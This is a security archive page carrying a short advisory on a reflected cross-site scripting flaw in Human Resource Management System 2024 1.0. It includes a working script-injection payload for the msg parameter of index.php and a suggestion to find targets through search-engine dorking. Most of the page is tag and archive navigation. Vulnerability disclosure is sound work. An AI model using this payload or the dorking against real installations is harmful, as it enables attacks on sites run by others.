*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Lodging Reservation Management System 1.0 Insecure Settings

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Tag

#ruby